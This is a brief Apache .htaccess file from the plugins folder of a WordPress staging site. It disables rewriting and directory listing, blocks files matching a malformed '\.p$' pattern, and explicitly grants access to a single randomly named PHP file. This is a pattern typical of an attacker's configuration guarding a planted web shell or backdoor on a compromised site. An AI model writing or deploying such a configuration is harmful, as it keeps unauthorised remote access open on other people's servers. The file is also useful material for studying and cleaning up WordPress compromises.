/home/staginga/www/wp-content/plugins/.htaccess
<IfModule mod_rewrite.c>
RewriteEngine Off
</IfModule>
Options -Indexes
<FilesMatch "\.p$">
Deny from all
</FilesMatch>
<Files VvXkszhn.php>
Allow from all
</Files>